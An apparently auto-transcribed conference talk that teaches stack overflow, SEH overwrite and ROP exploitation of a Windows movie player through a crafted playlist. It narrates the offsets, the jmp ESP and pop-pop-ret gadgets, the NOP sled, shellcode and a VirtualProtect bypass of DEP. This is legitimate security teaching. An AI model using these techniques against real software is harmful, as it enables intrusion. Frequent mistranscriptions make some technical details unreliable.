Smashing the Stack to Building ROP Chains with Gadgets

hey everyone how are you you guys still wake yeah okay well I'm gonna put you to sleep how many people like looking at hex yeah that's right that was more hands-on inspecting that's good okay so my talk is really long and I can't say at all because I buffer overflow or something I don't know I I don't know what I was thinking when I submitted this talk because I thought I could go from like beginning to end you know in 60 minutes and we'll see what it happens I'm paying two tracks let's see there we go Who am I I'm paying tracks I'm a lead security engineer at a big company somewhere around here and I like

I like trying to figure out how things work and I like breaking things you know I didn't put that in the slide but I do you like breaking things and we're gonna learn how to break some stuff today I mean this is not my profession at all I do this for fun even though people have told me that I probably should look for work in this field what I do actually do is I I do malware reversing for a career this is kind of similar so I wanted to talk about like how to get started in this field I think that a lot of people don't get started because they think man there's hacks involved it's hard or

there's assembly language right it's really hard it's not really that hard I think it's kind of like you know you just have to get your feet wet and then you realize you know what the water is actually pretty warm you know I'll get into it a little bit more there's a lotta there's a lot of literature out there and I I think that one of the problems that I've seen with the literature is it dives in real deep right really fast and then it just scares you off like my brain would hurt after reading a couple of pages and I'd have to walk away and then like a year later I'd be like wait I remember

I wanted to learn about that so today I hope that I can like give you that push into the water and hopefully it's not too deep and you know you guys can start you know breaking some stuff too and be like if you guys have questions afterwards and you're interested in you're reaching out to me with questions and stuff I'm always open open to like you know sharing what I know and hey if you know something more than me please let me know because I am all about learning I would love to you know share information so when you get started what you need it's really makes it a lot easier if you have some type of virtualization

software VMware is great you really probably want to have something that can take snapshots right because it's a real bummer when you have to go and like start everything over again over and over and over again if you can take a snapshot and go back to the snapshot quick it makes life a lot easier you need a victim right today a Microsoft apt is gonna be a victim because just it's just so easy right now because on Microsoft right Microsoft is great but it's because this particular piece of software is just like I think it was raining just to be like you know pwned I don't know so and you needed to bugger right and some other tools I'm going to

show you that there's some of the tools that we're gonna use some really really cool tools so I am NOT very good with slides and we're not gonna be doing a slideshow here I did pray to the demo gods this morning and I'm hoping that they heard my calls because this is an entire demo for 60 minutes with some slides thrown in so what do we have here we have a Python script I hope everybody can see it wait in the back if not please move forward there's lots of space down here and it I'm using Python if you were a ruby person use a ruby you know if you are a sea sharp person some more power to you man

I use Python just because I don't know I used to be a Perl guy and then one day I woke up and realized that everybody's saying that Python was easier it was really right and I decided to change my ways so I have a script this is how you want to start out with a buffer overflow what do we have we're gonna we're gonna like create a hundred eight thousand days sorry I was missing a zero just uh a thousand days right why is capitalized why I have no idea that it seems to be the convention right like I was telling the client the class I was teaching yesterday I would have chosen capital B's for those that were

not in my class why would I choose capital B's for the thing I want to put in there any one capital B's okay capital B in hacks is 42 it's the answers the life of it use it the universe and everything right but I know right yeah yeah that's true so I'm using a it's just because it's convention you can use whatever you want if capital B is 42 what's capital a anybody 41 right exactly so we're gonna we're going to just create a file this particular piece of software is a movie player right and the movie player needs a playlist we're creating a playlist obviously with a bunch of A's in it right and that's

right okay so I'm gonna just go and run that script I called it exploit underscore AIP and it created a file it's it's my playlist let's check it out look at that all those moves are those songs in that playlist right looks looks good to me or movies I'm sorry it's a movie player and I'm gonna go over so I have two boxes right you need two boxes or two boxes if you can do run Python or whatever script scripting language that you use on a Windows box you can probably get away with just using one box if your victim is you know the same platform is what you're developing your code in right but I'm using Kali as one

box I'm using my Windows box obviously from our victim I'm using a shared folder between the two so that I can just create the file on one side and then you know execute the exploit on the other so this is my exploit this is very complicated right this is what I'm talking about let's get our feet wet let's dip our toe in right it's just a bunch of Bay's well come to find out with this piece of software let's fire this piece of software up I'll pay later okay I'm gonna open it up okay here's the file okay and I'm gonna open it up in a debugger immunity debugger okay immunity debugger is a debugger based on

ollie debug lots of people know about Holley do bug right because we use it for malware reversing immunity to debugger is an awesome debugger as well it's based a lot like I said on all you do bug the nice thing the reason why I'm using it is because it supports Python right and there is this great gentleman Nate whose name is Peter and I cannot say his last name but he goes by the name cor LAN and Hiro Mona and Mona is a great tool to help you figure out you know how to write these exploits so I'm going to go in attach my debugger to the app the application and see what happens right so I'm gonna start it up go and

the application crashed first what I need to do is I need to go and accept some exceptions that I have nothing to do with the overflow that I just did to this but you will see right now that there's a couple things that have happened right do we see something that might be noticeable on the screen at the moment yes we see some forty-ones there's lots of forty-ones there's about a thousand of them actually there's probably multiple thousands of them right in memory right now the other thing that I've done is I've overwritten ie IP e IP is the instruction pointer that tells the application what it's supposed to do next guess what there is no instruction

at memory address for one for one for one for one yeah so what what just happened I just crashed the crash that just by sending your days all right that's it I'm done hey how'd you guys like my talk okay okay thanks thanks okay let's let's let's develop this into something more meaningful meaningful right okay so we're gonna go and you know what I'm just gonna fix my screen here yeah I made it smaller yeah for some reason it's not it's not really you're doing what I wanted okay so I'm so what I need to do now is I need to figure out how far into my payload I have to go before I over righty IP right

because I really want to control a IP because if I can control a IP I can tell it the application what to do right it becomes mine so what I'm gonna do is I'm gonna use a tool that lots of you know how many to red teamers are in here raise your hand high be proud that's right okay I'm now red teamer bye I aspired to be one Metasploit is a great tool and what we're going to do is we're going to utilize a function of Metasploit called pattern create man my sorry about this having it plugged into this this projector is messing with my okay here we go and if you go and use it what it

does is it creates a cyclical pattern actually you know what before I do that let's but say how big I want it because that's going to be really bad okay yeah sorry guys

there so you can see it oh you gotta be kidding me Oh Kenya oh good okay I'm glad you can see it I can't I can't see anything okay there we go I can see it now okay I'm gonna do this again with 1,000 characters there we go okay so what it's done is its created a cyclical pattern right there's no repeating pattern in this right I think there is probably limit as to how big the sort of pattern you can create but for our purposes here we only need a pattern that's thousands bytes long so what I'm gonna do is I'm gonna throw that into my script real quick okay and I'm going to replace my thousand

days with my pattern

so

okay so here we are we've got our pattern I'm gonna run it again this this went better in my head okay okay so now if you look at the the file right we've just got this pattern okay so I'm gonna go back over to my Windows machine and now I'm gonna try to figure out how far off or how big the office offset is before I'm hitting yucky

opening it up okay I've attached I'm gonna crash it again and crashed it again right this has cost the crash now look at it and see what's an EIP we have a different we don't have four ones anymore right because I didn't send all A's to it capitalized but I do want to know what the this represents how big of an offset it is I can go back and take this hacks that is in the IP right now and ask Metasploit what the offset is by using pattern off offset so pattern offset is the partner to pattern pattern create but I'm going to say even save some time and I'm going to use Mona right - to figure it out so within the

immunity to bugger I can just go down to the bottom and say hey Mona I want the pattern offset of three seven six nine four one three six okay an offset of 260 bytes that's all and then I have control of yucky so I'm gonna go back I'm gonna change my script again I'm gonna get rid of this pattern and what did I say two hundred sixty five sixty bytes all right so pre e IP equals 260 bytes so this time I'm going to change this to Priya a IP right but hey you know what I also want to make sure that I am overwriting the IP so I'm gonna put B's for B's in because that will fill out B

IP right because I need four bytes for this register and then I'm going to fill the rest of it with what sees ya see sounds good so I'm gonna say tail size equals total - the payload size right let's see the length of the payload and then I'm gonna say pretty much just this up here same thing and I'm gonna put season here and change this tail size so what we're gonna have this file oh yeah what did I do yep that's right thank you did I miss another one oh yeah nice thanks guys okay this is the reason why and you always have to pray to the demo gods okay perfect right so hopefully the bees will show up

in an EIP okay go back over and start it up again so there's a lot of repetition to this right you're going to be going back and forth back and forth until you get what you want

oh yeah set they're happy about

yeah there you go awesome it's very hard with this screen the way it is okay okay so now what have we done we verified that indeed we have 42 s in VIP okay the other thing that to know is I want to look at the SAC down here where this blue line is is the stack right and you can see how I have A's above the bees the bees at memory address 0 0 1 8 F 2 0 4 is apparently where a IP is being pulled off with stack right more than likely there's a red that occurred that caused this to happen right there's a saved EIP that's supposed to be at that particular memory address the function

is finishing going back to the calling function and instead of going back to where it's supposed to I told it to go to BBB B right hex address 42 answer to life the universe and everything right but then also on the stack you also see C's going down further right I have control of a lot of the stack right now right so I can do a lot of stuff here so the next thing I want to do is I want to do something with this man what can I do what can I do from here I can I can go if if that that was a ret that told the application to go someplace else

well don't I go and try to figure out where I wanted to go hey let's see where where we can tell it to go right ok so Mona has this great tool called jump and you can say Mona I want to know where all the addresses in this memory spaces that includes a jump in I'm very interested in a jump ESP why a jump ESP because ESP is highlighted in blue right now right I have control of that memory address right I can I can tell it to go someplace as long as I put that memory address in that spot where that blue line is because that's where ESP is pointing so I'm gonna go and ask Mona for that I'd

say Mona jump - are because it's register yes ESP right well I've done this by the miracles of television I've gone and done that already sometimes whenever you run application commands and Mona they come back really quick sometimes they come back really slow so if you're doing a presentation like this and you'd say Mona jump it'll come back pretty quick and you know people won't be staring at you for a long time if you go and say Mona rap right and that's where we're trying to get to you might as well tell everybody to go get some coffee come back in an hour you know so yeah you you definitely want to think about that whenever you're

doing this type of work so I did some of this beforehand and what I want is I want to know about the jumps so in my files I have a jump text file that had motor create and if you go down you'll find that there's all of these jumps here right all of these jumps now the interesting thing about the way Mona goes and looks for things is it goes and says hey if this library had or this delouse has any type of exploit mitigation properties I don't really want to look in them right if a deal has a SLR turned on and the the memory addresses are always changing that's no good to me I need to have

addresses that are reliable right now all the OSD loz in Windows 7 are all a SLR they're changing all the time so I can't use those very interesting this application has multiple libraries that got shipped with the application and they are all for the most part safe for me to use because there's no memory or exploit mitigation properties compiled into them makes it very easy to do this type of work with this application so there's actually this one file that your library you see come up over and over and over again its configuration DOL there is no mitigation and on at all no rebase no safe seh if you keep looking across the screen no aslr so

we're gonna just take this jump ESB this memory address and we're gonna throw it into our script right here now what I need to do is I need to pack it because the x86 architecture is little onion which means it flips all the bits backwards so I can either go through the painstaking task of flipping my back bits and making a mistake while you guys are watching or I can just use pack and have it do it the work for me right okay so now I should get my my application to go and execute that jump now did I put the jump in there I didn't inject any type of code so far alright this is

really important as far as rap is concerned what rhop is is the art of not injecting code into the application but it's still having and troll of the application itself so what I've done is I've found an instruction that already exists something I can use all the time and I'm going to tell it to go and execute this code what I'm also going to do let's just look go back and look at the application again we have a series of C's right and I need to oh yeah I have a series of C's and I need to figure out how many see how much of a distance there is between where that command is where the memory addresses where I'm

controlling EIP and where ESP is pointing at the moment right because what I'm gonna do is I'm gonna want to put some code in there to to execute now I'm kind of stepping away from Rob for a minute with this extra this this demonstration just so that you can see how that you know this one rap instruction in a way this one gadget is going to help me out okay so I'm gonna what do I have I have one two three four I have sixteen C's in between so I'm gonna put that in my script so that we know we can also put some instruction that instructions in there so I just say say D for the sake of argument because

I'm on a roll now and I'm gonna also throw in to the payload I'm gonna throw in hex see see anybody know what hex CC does to a debugger it pauses it right yep okay and I'm gonna just throw forward those in write the one is good enough right but I'm gonna throw it for in because it will look pretty okay oh yeah thank you good job okay okay let's check it out and see what happens

start it up attach the debugger again right and now we're gonna actually you know what before I load it what I'm gonna do is I'm going to halt the ex-ceo actually you know I would hope the CCS I was thinking ahead and didn't even think about it okay so I'm gonna accept these exceptions that have nothing to do with my okay so what just happened do you guys see what is on the in the instruction panel we have CCS how did that happen I told us to go there right what happened is something that should never really happen in an application I just told the application to jump in execute code on my stack right what you're

seeing up here there was those CCS and then the 43's the int ie B X that's the stuff I'd put on the stack right that's those aren't instructions that's my my my playlist right so now I have control I can do whatever I want I can execute because I can I got that in three they interrupt three to execute so what am I gonna do I'm gonna go back and I'm gonna add shellcode to this particular sport exploit because it's pretty easy right where did I get this show code anybody now yeah I have no I have no idea where I got it yeah I have no idea so I don't know what it's gonna do right okay

so I need to get rid of these C's first right yeah

the reason is because I am trying to see what's happening on in the I'm trying to see what is happening in the memory space while I'm doing this research right because whenever whenever you are affecting things in the application you need to know how you're affecting it and you don't know before it happens how the memory set up you when you start out you just know there's a there's a vulnerability you know you see it on an exploit DP you see an SES CBE right it says there's a vulnerability and then you do some more research and it says oh yeah if you throw so-and-so into this it's gonna crash it and then you're like

oh it crashes it yeah you know how can I kick take control of it right I'm about to take control of it right really really well okay oh I'll get to that yeah yeah yep yep yep yeah the interrupts 3 is is telling the the debugger to that is this a way of yeah that is a breakpoint but I think it's not the breakpoint that you were thinking of but I will show you that in a minute so a minute ago when I like hesitated I said oh you know what I don't even need this when I hesitated I said oh wait I need to do something else I was thinking oh I need to go and you

know sent my breakpoint all right did anybody just see what happened I popped my shell right that's easy that's it all right did I use rock so okay yeah you guys are kind okay so I popped it right that was easy now my foots wet right you guys can do that anybody can do it if you got the right application to do it five times make sure that you can get comfortable doing it right it's really easy okay so now let's let's like dive in a little bit deeper right so if I go back to my slides real quick so we found an EIP right I talked about pattern create so there there's this interesting thing

called structured exception handling and what it is is whenever you know a good developer writes code they will write it so that they know that there's going to be this particular thing that happens right in the code and they know that sometimes it might not successfully do whatever it's supposed to do right so they create an exception for it cool right so I'm gonna try something and if that do something doesn't work out we're gonna try to catch that exception and then we're gonna do something else if everything's fine with the first do something then it just keeps on going it totally ignores the you know the catch but if something bad happens like you

know VIP gets shoved with for one for one for one then we probably should do something about that right well interestingly enough with this particular application when I did that when I threw the four ones into EIP an exception occurred let's check it out so I'm gonna go back and you know I love the color of the command shell I just have to say that's it that's a beautiful thing all right that's not supposed to happen but hey whatever that's cool okay so I'm gonna start it up again and I'll pay later and I really have to try to figure out how to get rid of that so I'm gonna attach to it and I'm just gonna go

through this again right and actually you know what let's create a different totally different file pop back over and this time I'm going to have a different script and it's called exploit underscore Sh right yeah does it look familiar yeah it looks a lot a lot familiar right it's the same script that we started out with this time they difference is there's 700 bytes instead of a thousand bytes why well in this case it really doesn't matter right in some cases it might really matter because what will happen is sometimes you can do certain things with you know certain size payload but let's say you know you want to throw an exception right and take

over the exception handler and for some reason if the payload is too big the exception never occurs because maybe something else handled the fact that your payload is too big so I'm just going to pretend you know that I have to have a payload of 700 instead of a thousand to you know initiate the vulnerability in this application and what I'm gonna do is I'm going to create this file right so we've got a file of a is 700 of them go back this time what we're gonna do is we're gonna pass the exception pass the point of E is

open it up we crashed okay we're gonna get to the point where the IP is over in with four ones again right we just saw this this has just happened but the thing I didn't do before is I didn't look at the exception handlers right I over wrote the exception handlers for this so this application is good right in a way kind of it knows something bad happened right so in this case something bad happens so the exception should be go do something to fix it right but here's the bad thing i over wrote that too with less letters like really come on so now what do we do we're gonna do this exact same thing as

we did before we're gonna do the pattern create everybody and keeping up with me that's excellent awesome I love it so this time I'm just gonna say user share Metasploit tools exploit pattern crate right our friend pattern crate from Metasploit i'm 700 and we're gonna throw it into the script wow that's pretty trippy here let's just do that again because i have no idea what just happened

okay so now my file should have oh this isn't just not going along I apologize guys this is the reason why you don't do live demos ok parent right he apparently okay and that is okay I did prepare for this I had an original yeah right okay so this is the other thing that's bad about this is the fact that you know you try to do something cool like this in under an hour and that never does there we go okay so now we should have our pattern I'm going to throw that in in my payload

while I'm doing this do you guys have any questions while I'm trying to recover okay

okay here we go so here we we have a new file right and it should have our pattern in it now we can go and open this up again and we're going to find out what the offset is for for this exception handler okay okay so here's the point where we we were at before we over Oei P with that a memory address should be the same right because it's the same point 260 characters into the payload as we had before right now we're gonna actually look at the exception handlers and now the 40 ones are different right we've changed what's in the for the exception handlers the nice thing about the way the exception handler works on

Windows is that you can use a gadget called pop pop ret to be able to take control of that particular data structure which is the exception handler so what we're gonna do is we're gonna go back to Mona and we're gonna say Mona I want to know what the offset is of this lower address so the way that the exception handler is actually work is there's two parts of each record the first part is a pointer to the next record so if you think about it think about this whenever you have an exception there's the the part where you know if the exception occurs there's the catch part and it goes off and you know

there's it's supposed to go do something that is the exception handler itself and there's a pointer on the stack that points to that code to go and do that right and then below that arab right above that there's a pointer to the next exception handler so if the way it should work is it for some reason if that handler fails what do we want to do we want to go to the next panel geez maybe the next Handler and have that you know take care of what's going on and if that fails let's go to the next thing and the nice thing about Windows is the fact that there's an exception handler for the OS right and if you hit that

your application just crashed it just disappears right so that is the reason why you know applications crash a lot of the time is because the exception handler process you know try to deal with whatever's going on and then it got down to the bottom and you know naturally occurring not what we're doing here of course and you know the operating system says oh you just hit my exception handler I'm shutting you down right you're going down now so we are going to take advantage of this this you know functionality and redirect execution flow because of it so I'm gonna go and take on the offset of this lower address which is actually the pointer to the next record in the chain

this this one up here the four one three four seven five four one that is actually the pointer to the exception handler itself so what I need to do is I need to remember the point the pointer to the next record which is the lower one right for something I'm going to do in a minute but also this upper one is interesting to me because that I can use that to do kind of what I did before I can go find a memory address that has a pop-up right in it and redirect the flow of the execution of this application so I'm gonna go and ask Mona for the pattern offset and I'm going say 3 3 7 5

4 1 3 2 and the offset is 608 bytes so I'm gonna go back and this time I'm gonna go and say 608 bytes into it right free seh equals 698 bytes right and what I want is this to be pretty Sh and then I'm going to write my age or my B's to overwrite the the pointer to the next record right and then I'm going to put season 2 right overwrite the pointer to the exception handler itself and then I'm gonna just finish it out tail size equals total minus the length of the payload yes thank you so do you guys under no why I'm saying doing this last bit why why do I keep doing this here

the tail size that's right yes I want to make sure that my payload stays the same size so I'm going to exactly because if I make the payload too small I not might not overwrite something that should trigger the vulnerability yeah sometimes you can't yep it depends on the application this is all dependent on applications right every application that you look at is going to be completely different this one you know I think that you could probably write a couple thousand thousands of bites into it and it doesn't care okay

yeah it's called fuzzing trial-and-error yeah good question you know there's another application that I gave to the class for an exercise yesterday and you know I didn't tell them how big of a buffer they needed right how big of a payload they needed and I said hey start with ten thousand bytes and just keep on going until you crash it right because the application is just gonna say oh yeah that's cool I'm gonna ignore you and then you're gonna send it yeah more bytes and it's gonna say yeah yeah I ignore you I'm ignoring you again right and then you're gonna get to this one point it's going to like just right just crash out now

all the place okay so now let's see if we overrode the exception handler here

okay here we are we over Oh the EIP you with 41's and here we see that we indeed have 42s in the pointer to the next record and 43's in the the exception pointer to the exception handler so we now we we've won control again right we're back in the same situation what can I do here well the thing with the exception handler on Windows is to take it advantage of this we want to be able to sort of pivot like we did before we before we kind of pivoted from you know running instructions normally from to running instructions off the stack so this what I'm gonna do now is I'm gonna use a pop up Brett and that's going to

allow me to kind of pivot execution back to the stack right and a gadget when you're doing it dealing with rap is normally some type of series of instructions followed by a ret so a pop pop ret is a gadget you know as far as Roth is concerned so we're you know with this we're definitely getting into rock territory and it's a simple one but we're still doing it so let me just go and back and look for a Rob all right pop hot rap so in moaña I mean in the immunity debugger I could go in and ask Mona Mona I want to know where pop-up practices are and there is a command called seh right because we're

dealing with seh at the moment makes it pretty easy when you run it you will get a file called SCH text and in there if we go down we will find all of these pop-up rights look at them all I mean there's tons of them let's see how long this thing is right seh you know thousands of pop-up rights that we can use so we can pretty much you know grab want any one of them that we want oh man I am way out of time Jared sorry man okay so this first one should I use it no I can't use this first one why because this application doesn't allow me to use hex zero zero right in mic

payload if I try to use it it would it would just mess me up so I'm gonna use the next one I'm gonna use this one go back was that somebody asked why yeah okay why okay that's a great question there are bad characters for some applications some applications don't like is your hex zero zero does anybody know why an application wouldn't like hex zero zero it's a no bite it's a string terminator right right so with this application guess what it does it reads in the playlist is a string right and it terminates so if my payload has a null byte in it then it stops reading at that point my playlist is that much

shorter right so I have to pick this next instruction because there's no no voice in it okay so what I'm gonna do is I'm just gonna go in and do the same thing as I did before and why am I using struck pack does anybody remember that's right this is a little endian so we need to deal with it accordingly okay so the other thing I'm going to do for times sake is I'm also going so i over wrote that i put the pack in the spot where the pointer to the handler exception exception handler is so that i can execute my popup read the other thing that i'm going to do if that is going to

that caused the behavior of a seh to actually move ESP I mean allow me to jump to the point where the pointer to the next record is which is the four bytes before that where my bees were and what I'm gonna put in here is I'm gonna put a jump six bytes because what I'm gonna do is I'm going to pop up Brett kind of pivot it onto execution onto the stack execute my jump six which will allow me to jump over the gadget that I have here my pop out Brett and then I'll execute my show code so what I'm going to do here is I'm going to put EB 0 6 which is in heck

machine code a jump 6 so remember that there's going to be a test later and then I'm going to also put two nulls and the reason why I now know is I'm just going to put two knobs in there and I'm putting those knobs in there because I just need to fill some space right because there's 4 bytes that I have to fill for that particular record and then what I'm also going to do is that since I know this is going to work I'm just gonna go and grab my shellcode again all right and I'm going to put it into my script

okay and if I put it right here I'm actually going to put some knots in here as well just so it gives it a little bit of nice landing not the reason you put knops in is to make it so that you can allow the cpu to kind of slide down the stack right sometimes you don't know exactly where the CPU is going to land right now we know because I'm jumping six bytes but if we don't know exactly where we're in the land putting an OP slide in there actually gives us a bigger land landing to to land in so I'm gonna put that in there and then after that I'm just gonna put a

payload plus equals my shellcode right

okay and I'm gonna execute that and if oh I must have done something wrong um oh yeah yeah no maybe my shell code is longer than let's say hex it looks fine let's see what just happens and go from there okay so we're gonna go back and start it up again and see if it crashes yep okay so do what just happened is we got two shows for the price of one right very cool and what's really nice about this particular exploit is it cleans up the application right I don't even have to close it out I mean that's really nice okay and I got to yeah and they're persistent too this is actually something that's particular to this one

application so what is Rob Rob is it is where you go and find a series of instructions they have a return at the end and the reason for doing that is so that you can put like I did with the pop-up bread I go find up the pop-up right get that memory address and put it onto the stack right and then what I do from there is I continually add you know different gadgets to create a program that I want to do right the interesting thing about wrapping is it has been proving proven that is nearly Turing complete meaning that you can pretty much do anything that you want as long as your gadgets you know are plentiful enough to do it

now the interesting thing about this application is when you ask Mona to Rob it goes and finds all the ROPS in the space and when you're looking for gadgets I mean gadgets in the memory space of the app application and when you are looking for gadgets you're not looking for gadgets in the normal way that you think about it your what it does is it goes and looks for the machine code for Rhett and then works backwards to see if there's the possibility of creating a series of instructions that would help out in wrapping the reason for doing that is because the x86 architecture has a multi variable length instructions right it's kind of like taking a long

paragraph right and taking out all the way whitespace mashing those words together right you can still tell kind of what the the paragraph said or the sentence said originally right but if you go and look at specific spots of the paragraph without reading through it you'll find other words in there right in between the real words that were there before can you visualize that right the rock when you look for gadget you're doing the exact same thing so sometimes it's funny when you're in the debugger you know you're picking a memory address that's not really a you know the right memory address for the application code but it starts a gadget with a return at the end right and the

double bugger goes crazy because then you see a bunch of other like instruction past that gadget that make no sense like there would be no way there'd be instructions like that but it's just because that gadget actually falls in between the real instructions right so that's what wrapping is like I said wrapping the gadgets are normally find in returns but that's not always true you can have gadgets that have any instruction at the end that will get you back to you know it executing the next address I'm just like a rat so if you had to jump ESP that would be at work as well yes sir when you're wrapping you're going to find a bunch of memory

addresses that do different things and those memory addresses are in you know either dll's more than likely right I like configuration DLL right that's a goldmine for this application and what you do is you say you know what I need to do a certain thing I'm gonna find the memory address for a series of instructions that do that for me and I'll have an example in a minute and then you just put those on the stack so you're not putting instructions on the stack it like the difference between the pop up Brett in the jump 6 they had the first one is a gadget that would be a Rob alright part of a Rob the the jump

6 that was an instruction I put in my payload I want with when I rob I want to not put any instructions in and I only put memory addresses on there okay so the here's my here's my first exam or my my only example I took my other example out actually so what did we say we said that no bites break this application right so I can't use a nobody what if I have to push a something that has a no bite on to the stack for instance this 201 and I need to move it into EB acts what do I do all right that's Rob right so I found that memory a memory address 6 404 C 2 6

8 more than likely being in configuration that DLL a pop EAX and a return is that a gadget yeah it is because it's an instruction with a return at the end right so what should I do with that I'm going to take F F F F F D F F and put put it right under it so right in my payload right I have my age my age my age my age and then I have this value first value 6 404 C 2 6 8 and then after that I have FF FF FF FF d FF right and then I need to negate it why because if I need to negate that value it becomes my 201 did I have to put any

no bytes into my payload no I didn't did I put any instructions on in my payload yet no I didn't right yeah as long as there's if you find a gadget that's an ad in your then you can use it definitely yeah man definitely go ahead Oh

actually whenever you ask Mona to rob you can say Mona robbed and I want to only use characters that are good for me so I can tell it what bad characters are and then it will only find gadgets or make suggestions of gadgets that do not have those characters great question thank you I appreciate that and then the last instruction right yeah memory address six one six four one c70 there's an exchange EAX EBX what does that do for me that puts my 2:01 into the EBX into the EBX register right I've accomplished my goal I have not put any code into my payload I've only put memory addresses in there right the neat thing about this is if I

know that there's multiple memory addresses with each of these types of instructions right I could make it so that it changes my payload every single time so why would I want to do something like this well there's something called Det right DEP is kind of a pain right because what does that do that makes it so that you can't execute code off the stack yeah that sucks all right well Microsoft gave you a solution for that it's called virtual protect and a bunch of other OS functions virtual protect allows you to turn know execute off on certain pages of memory well do we want to do with that I don't know maybe turn off the you know

make the stack no execute I mean make it execute right executable we can use virtual protect to do that why did I have this example here that 201 well for virtual will protect maybe Mike my shell code is 201 bytes long so what I do is it with virtual protect you needed a couple of things whenever you call it you have the return address is the location as to where virtual protect is going to return to that's going to be where my shell code lives right and then there's the LP address that is where I want to change my address permissions to execute right that's gonna be the same spot the show code and then there's a

couple other things that we need to do right we need to define execute read write which is the 40 it's the same thing as before and then there's this weird thing at the end I don't really know why that function needs it and then to do it my originally if I have had time I was going to show you how to use push ID to put all of the information for to execute virtual protect onto the stack by using push ad that would be an exercise for you guys at home is there any questions as far as rap is concerned and getting your feet like wet and hopefully a little bit of what I've shown you gets you to want to you know

try this out for for the pop hop Bret allows you to pivot the execution from the normal area of memory to the area on the stack only when you were trying to exploit seh because what it does is it changes it moves execution points execution to that pointer to the next s eh record which you have control over yep yeah no that's cool yeah if you have questions please come and ask me yep yep thank you very much yes thanks a lot